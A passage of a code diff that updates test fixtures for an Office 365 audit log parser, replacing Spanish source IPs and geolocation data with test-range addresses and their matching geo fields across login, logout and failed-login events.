-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:31:33",
         "o365.audit.ExtendedProperties.FlowTokenScenario": "Login",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3402,20 +3348,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3433,8 +3377,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:14:25.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3451,7 +3395,7 @@
         "fileset.name": "audit",
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "input.type": "log",
-        "log.offset": 49715,
+        "log.offset": 49649,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3460,10 +3404,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:14:25",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -3491,19 +3435,17 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3518,8 +3460,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:14:51.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3537,7 +3479,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 50824,
+        "log.offset": 50756,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3554,10 +3496,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:14:51",
         "o365.audit.ExtendedProperties.FlowTokenScenario": "Login",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3587,20 +3529,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3618,8 +3558,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:29:56.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3637,7 +3577,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 52332,
+        "log.offset": 52262,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3654,10 +3594,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:29:56",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -3686,20 +3626,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3717,8 +3655,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:51:23.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3736,7 +3674,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 53782,
+        "log.offset": 53710,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3753,10 +3691,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:51:23",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -3785,20 +3723,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3816,8 +3752,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:39:45.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3834,7 +3770,7 @@
         "fileset.name": "audit",
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "input.type": "log",
-        "log.offset": 55232,
+        "log.offset": 55158,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3843,10 +3779,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:39:45",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -3874,19 +3810,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -3901,8 +3836,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:40:16.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoginFailed",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -3920,7 +3855,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 56341,
+        "log.offset": 56267,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3937,10 +3872,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:40:16",
         "o365.audit.ExtendedProperties.FlowTokenScenario": "Login",
         "o365.audit.ExtendedProperties.RequestType": "Login:login",
@@ -3970,20 +3905,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -4001,8 +3935,8 @@
     },
     {
         "@timestamp": "2020-02-08T14:33:52.000Z",
-        "client.address": "37.29.234.179",
-        "client.ip": "37.29.234.179",
+        "client.address": "67.43.156.12",
+        "client.ip": "67.43.156.12",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4020,7 +3954,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 57849,
+        "log.offset": 57775,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4037,10 +3971,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "37.29.234.179",
+        "o365.audit.ActorIpAddress": "67.43.156.12",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "37.29.234.179",
+        "o365.audit.ClientIP": "67.43.156.12",
         "o365.audit.CreationTime": "2020-02-08T14:33:52",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4069,17 +4003,16 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "37.29.234.179",
+        "related.ip": "67.43.156.12",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 16299,
-        "source.as.organization.name": "XFERA Moviles S.A.",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4172,
-        "source.geo.location.lon": -3.684,
-        "source.ip": "37.29.234.179",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "forwarded"
         ],
@@ -4097,8 +4030,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:53:24.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4116,7 +4049,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 59299,
+        "log.offset": 59223,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4133,10 +4066,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:53:24",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4165,20 +4098,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -4196,8 +4128,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:22.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4215,7 +4147,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 60750,
+        "log.offset": 60674,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4232,10 +4164,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:22",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4264,20 +4196,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -4295,8 +4225,8 @@
     },
     {
         "@timestamp": "2020-02-06T09:28:04.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4313,7 +4243,7 @@
         "fileset.name": "audit",
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "input.type": "log",
-        "log.offset": 62199,
+        "log.offset": 62119,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4322,10 +4252,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-06T09:28:04",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Logout",
         "o365.audit.ExtendedProperties.ResultStatusDetail": "Success",
@@ -4353,19 +4283,17 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4380,8 +4308,8 @@
     },
     {
         "@timestamp": "2020-02-12T21:38:35.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4399,7 +4327,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 63308,
+        "log.offset": 63226,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4416,10 +4344,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T21:38:35",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4448,20 +4376,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -4479,8 +4406,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:13:36.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -4498,7 +4425,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 64758,
+        "log.offset": 64676,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4515,10 +4442,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:36",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -4547,20 +4474,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
